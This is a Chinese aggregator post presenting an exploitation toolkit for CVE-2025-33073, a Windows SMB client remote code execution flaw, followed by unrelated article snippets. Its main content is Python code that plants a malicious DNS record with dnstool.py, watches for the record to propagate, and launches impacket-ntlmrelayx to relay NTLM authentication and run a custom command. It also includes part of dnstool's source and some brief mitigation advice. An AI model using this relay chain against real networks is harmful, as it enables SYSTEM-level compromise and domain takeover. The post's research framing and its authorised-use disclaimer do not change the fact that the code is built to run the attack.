news 2026/3/11 22:55:04

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

项目描述

该项目是一个针对Windows SMB客户端远程代码执行漏洞CVE-2025-33073的安全研究与渗透测试工具集。该漏洞被标记为高危(CVSS 8.8分),影响Windows 10、11及Server 2012-2025的所有版本,允许攻击者在经过身份验证的情况下通过网络实现SYSTEM级别的远程代码执行。工具集包含DNS记录操作和NTLM中继攻击功能,用于模拟和测试相关攻击场景。

功能特性

  • DNS记录操作:通过dnstool.py工具添加恶意DNS记录,支持ADIDNS over LDAP交互
  • NTLM中继攻击:利用impacket-ntlmrelayx工具发起SMB中继攻击,支持自定义命令执行
  • DNS传播监控:自动检测DNS记录是否已成功传播,支持超时控制
  • 多终端支持:可在当前终端或新xterm窗口中启动监听器
  • Kerberos集成:支持Kerberos身份验证,可与LDAP服务交互
  • 漏洞利用辅助:专门针对CVE-2025-33073漏洞的利用环境搭建

安装指南

系统要求

  • Python 3.x
  • impacket库
  • ldap3库
  • dnspython库
  • xterm(如需在新窗口中启动监听器)

依赖安装

pipinstallimpacket ldap3 dnspython

在Linux/macOS上安装

# 克隆相关工具gitclone<repository-url>cd<project-directory># 确保脚本有执行权限chmod+x *.py# 安装系统依赖(Debian/Ubuntu)sudoapt-getinstallxtermdig

使用说明

基础使用示例

#!/usr/bin/env python3importshleximportsysimportargparseimportsubprocessimporttime# 静态DNS记录常量STATIC_DNS_RECORD="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"defrun_dnstool(user,password,attacker_ip,dns_ip,dc_fqdn):""" 使用dnstool.py添加恶意DNS记录 """print("[*] Adding malicious DNS record using dnstool.py...")dnstool_cmd=["python3","dnstool.py","-u",user,"-p",password,"-a","add","-r",STATIC_DNS_RECORD,"-d",attacker_ip,"-dns-ip",dns_ip,dc_fqdn]subprocess.run(dnstool_cmd,check=True)print("[+] DNS record added.")

监控DNS记录传播

defwait_for_dns_record(record,dns_ip,timeout=60):""" 等待DNS记录传播并验证 """timeout=int(timeout)print(f"[*] Waiting for DNS record{record}to propagate...")start_time=time.time()whiletime.time()-start_time<timeout:try:result=subprocess.run(["dig","+short",record,f"@{dns_ip}"],capture_output=True,text=True)ifresult.stdout.strip():print("[+] DNS record is live.")returnTrueexceptExceptionase:print(f"[!] Error checking DNS record:{e}")time.sleep(2)print("[!] Timeout reached. DNS record not found.")returnFalse

启动NTLM中继监听器

defstart_ntlmrelayx(target,cli_only=False,custom_command=None,socks=False):""" 启动impacket-ntlmrelayx监听器 """ifcli_only:print("[*] Starting ntlmrelayx listener in this terminal...")ifcustom_command:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.append("-socks")returnsubprocess.Popen(cmd)else:print("[*] Starting ntlmrelayx listener in a new xterm...")ifcustom_command:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support","-c",custom_command]else:cmd=["xterm","-hold","-e","impacket-ntlmrelayx","-t",target,"-smb2support"]ifsocks:cmd.insert(-1,"-socks")returnsubprocess.Popen(cmd)

核心代码

DNS工具核心功能

#!/usr/bin/env python""" ADIDNS over LDAP交互工具 Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) """importsysimportargparseimportgetpassimportreimportosimportsocketfromstructimportunpack,packfromimpacket.structureimportStructurefromimpacket.krb5.ccacheimportCCachefromimpacket.krb5.kerberosv5importgetKerberosTGT,getKerberosTGSfromimpacket.krb5.typesimportPrincipalfromimpacket.krb5importconstantsfromldap3importNTLM,Server,Connection,ALL,LEVEL,BASE,MODIFY_DELETE,MODIFY_ADD,MODIFY_REPLACE,SASL,KERBEROSfromlib.utils.kerberosimportldap_kerberosimportldap3fromimpacket.ldapimportldaptypesimportdns.resolverimportdatetimedefprint_m(string):"""打印消息"""sys.stderr.write('\033[94m[-]\033[0m %s\n'%(string))defprint_o(string):"""打印成功信息"""sys.stderr.write('\033[92m[+]\033[0m %s\n'%(string))defprint_f(string):"""打印失败信息"""sys.stderr.write('\033[91m[!]\033[0m %s\n'%(string))

漏洞信息结构

# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨# 🔥 High-Severity Authenticated Remote Code Execution 🔥# Improper Access Control in Windows SMB Client (CWE-284)# 🛡️ 关键信息概览""" CVSS v3.1评分: 8.8 (高危) 受影响系统: Windows 10, 11, Server 2012–2025 (所有版本) 披露日期: 2025年6月10日 (已在2025年6月补丁星期二修复) 攻击向量: 网络 (需身份验证) 影响: SYSTEM级别代码执行,通过Kerberos中继进行横向移动 绕过: NTLM反射缓解措施 """# 🛠️ 立即缓解措施""" 1. 立即打补丁! → 应用Microsoft更新 (例如 KB5060998) → Microsoft更新指南: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073 2. 启用SMB签名 → 在所有客户端和服务器上强制执行 → 使用命令: Set-SmbClientConfiguration -RequireSecuritySignature $true 3. 限制NTLM使用 → 尽可能阻止NTLM → 使用EDR工具监控中继尝试 4. 为什么这个漏洞重要? - 绕过传统的NTLM保护 - 即使在SMB签名未强制执行的情况下也能工作 - 在配置不当的AD环境中实现完整的域接管 """

该工具集专门设计用于安全研究人员和渗透测试人员,以了解和防御CVE-2025-33073漏洞的相关攻击。请仅在授权测试环境中使用这些工具。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ5IUcd+bvYYh2w++QDLvscF
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/11 17:10:36

开题报告 springboot和vue- 服装面料采购系统

目录 系统背景与意义技术架构设计核心功能模块创新点与优势应用场景 项目技术支持可定制开发之功能亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作 系统背景与意义 服装面料采购系统基于SpringBoot和Vue技术栈开发&#xff0c;旨在解决…

作者头像 李华
网站建设 2026/3/10 15:32:08

1.6 死锁排查全攻略:如何快速定位并解决MySQL死锁问题

1.6 死锁排查全攻略:如何快速定位并解决MySQL死锁问题 📚 学习目标 通过本节学习,你将掌握: ✅ 死锁的成因分析和典型场景识别 ✅ 死锁日志的解读和分析方法 ✅ 快速定位死锁问题的工具和技巧 ✅ 死锁预防策略和最佳实践 ✅ 应用层死锁处理机制(重试、乐观锁等) 🎯 …

作者头像 李华
网站建设 2026/3/11 1:59:10

1.8 线程池调优秘籍:支撑高并发的关键技术要点

1.8 线程池调优秘籍:支撑高并发的关键技术要点 📚 学习目标 通过本节学习,你将掌握: ✅ MySQL线程池的工作原理和优势 ✅ 线程池的配置参数和调优方法 ✅ 不同场景下的线程池选择策略 ✅ 线程池监控和性能分析方法 ✅ 客户端、中间件、数据库三层线程池方案对比 🎯 学…

作者头像 李华
网站建设 2026/3/11 13:13:09

好写作AI:你的“案例破壁机”,把万字材料榨出黄金管理启示!

各位在法院判决书和企业年报里“考古”、分析案例到头秃的法学/管理学卷王&#xff0c;是否经常这样&#xff1a;案例材料读了十遍&#xff0c;笔记记了二十页&#xff0c;但一提笔写分析——“这些事实怎么和法律要件对上&#xff1f;”“商业表象下的管理真问题到底是啥&…

作者头像 李华
网站建设 2026/3/4 20:41:17

Moodle

Moodle是一个开源的学习管理系统&#xff08;LMS&#xff09;&#xff0c;可以理解为构建“数字校园”的基础操作系统。它诞生于2002年&#xff0c;核心设计理念是为教育者提供一个灵活、可控的在线教学环境。作为全球最流行的LMS之一&#xff0c;它支撑着从小学到大学&#xf…

作者头像 李华